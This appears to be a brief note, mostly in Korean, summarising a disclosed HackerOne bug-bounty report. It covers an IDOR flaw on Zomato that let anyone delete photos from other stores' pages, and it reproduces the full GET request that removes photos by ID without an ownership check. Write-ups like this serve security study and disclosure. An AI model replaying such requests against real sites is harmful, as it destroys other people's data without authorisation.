hackerone-ethernal-2018-09-l-404797
IDOR to delete images from other stores
업로드했던 사진을 삭제하면 다음과 같은 GET 요청을 했다.
GET /php/client_manage_handler?res_id=REDACTED&photo_ids%5B%5D=r_YxNDUOTE4MTYzO&removable=1&case=remove-active-photo HTTP/1.1
Host: www.zomato.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.zomato.com/
X-Requested-With: XMLHttpRequest
Cookie: REDACTED
Connection: close
res_id나 페이지에 대한 소유권 체크를 하지 않고, 단지 photo_ids만을 이용해 사진을 삭제했다. 따라서 다른 상점의 사진도 삭제할 수 있었다. 사진 ID는 상점 페이지에서 찾을 수 있었다.
tags: bughunting, wstg-athz-04, idor, severity low, web hacking